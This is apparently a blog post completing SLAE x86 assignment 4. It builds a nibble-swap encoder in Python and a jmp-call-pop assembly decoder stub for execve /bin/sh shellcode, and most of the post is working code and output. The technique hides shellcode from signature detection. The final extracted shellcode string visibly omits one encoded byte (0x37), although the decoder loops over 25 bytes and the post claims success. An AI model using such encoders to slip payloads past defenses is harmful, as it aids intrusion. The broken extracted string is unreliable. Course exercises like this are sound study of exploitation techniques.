Close

SLAEx86 - Assignment 4

The fourth assignment for the SLAEx86 certification includes the following requirements:

  • Create a custom encoding scheme like the “Insertion Encoder” we showed you
  • POC with using execve-stack as the shellcode to encode with your schema and execute

Seems like a fun exercise with some challenge and creativity. Let’s give it a try …

After going through the course material and reading the requirements of this assignment, it was apparent that I would need to do this in two parts. First, I would create a Python script to do the encoding of the execve-stack /bin/sh shellcode and then write a complimentary decoder in assembly.

Step 1:  Python Encoder

For the encoding scheme, I decided to do a ‘swap-byte encoder‘ to encode the execve-stack shellcode. My thought was to take each byte of shellcode and swap it (ex: 0x31 –> 0x13). This was completed by writing the following Python script:

#!/usr/bin/python

# Python Swap-Byte Encoder
# Example - \x01 --> \x10

# Load shellcode
# SLAEx86 execve-stack shellcode used in example ("/bin/sh")
shellcode = ("\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80")

src = bytearray(shellcode)

# Remove leading \x from shellcode and store in one string

sc_string = ""

for x in src:
 sc_string += '%02x' % x

# Swap-byte and print encoded shellcode in proper formats

encoded1 = ""
encoded2 = ""

print 'Encoded shellcode ...' + '\n'

for x in range(0, len(sc_string)-1, 2):
        y = sc_string[x+1] + sc_string[x]
        encoded1 += '\\x' + y
        encoded2 += '0x' + y + ','

print encoded1 + '\n'

print encoded2 + '\n'

print 'Len: %d' % len(bytearray(shellcode))

After executing the python script the following result was the output:

[email protected]:~/Desktop/Assembly/SLAE_Exam/Assignment4$ ./swapbyte-encoder.py
Encoded shellcode ...

\x13\x0c\x05\x86\xf2\xf2\x37\x86\x86\xf2\x26\x96\xe6\x98\x3e\x05\x98\x2e\x35\x98\x1e\x0b\xb0\xdc\x08

0x13,0x0c,0x05,0x86,0xf2,0xf2,0x37,0x86,0x86,0xf2,0x26,0x96,0xe6,0x98,0x3e,0x05,0x98,0x2e,0x35,0x98,0x1e,0x0b,0xb0,0xdc,0x08,

Len: 25

Step 2:  Decode the Shellcode in Assembly

After obtaining the swapbyte encoded shellcode I used the jmp-call-pop technique to write the assembly to do the proper decoding:

global _start

section .text
_start:

         jmp short call_decoder

decoder:
         pop esi
         xor ecx, ecx
         mov cl, 25 ; Place encoded shellcode length here

decode:
         ror byte [esi], 4 ; rotate the bits to the right by 4
         inc esi ; increment the ESI position
         loop decode

         jmp short EncodedShellcode

call_decoder:
 
         call decoder
         EncodedShellcode: db 0x13,0x0c,0x05,0x86,0xf2,0xf2,0x37,0x86,0x86,0xf2,0x26,0x96,0xe6,0x98,0x3e,0x05,0x98,0x2e,0x35,0x98,0x1e,0x0b,0xb0,0xdc,0x08

After a successful compilation I used the command-linefu objdump command to extract the shellcode:

[email protected]:~/Desktop/Assembly/SLAE_Exam/Assignment4$ objdump -d ./swapbyte-decoder|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
"\xeb\x0d\x5e\x31\xc9\xb1\x19\xc0\x0e\x04\x46\xe2\xfa\xeb\x05\xe8\xee\xff\xff\xff\x13\x0c\x05\x86\xf2\xf2\x86\x86\xf2\x26\x96\xe6\x98\x3e\x05\x98\x2e\x35\x98\x1e\x0b\xb0\xdc\x08"

Step 3:  Get a /bin/sh Shell

Using the C shell program I placed the extracted shellcode from the swapbyte-decoder.nasm file to compile and execute it to obtain an /bin/sh shell:

Success! There is now a working swap-byte encoder and a swap-byte decoder that is able to execute using the outputted shellcode!

Leave a Reply

Your email address will not be published. Required fields are marked *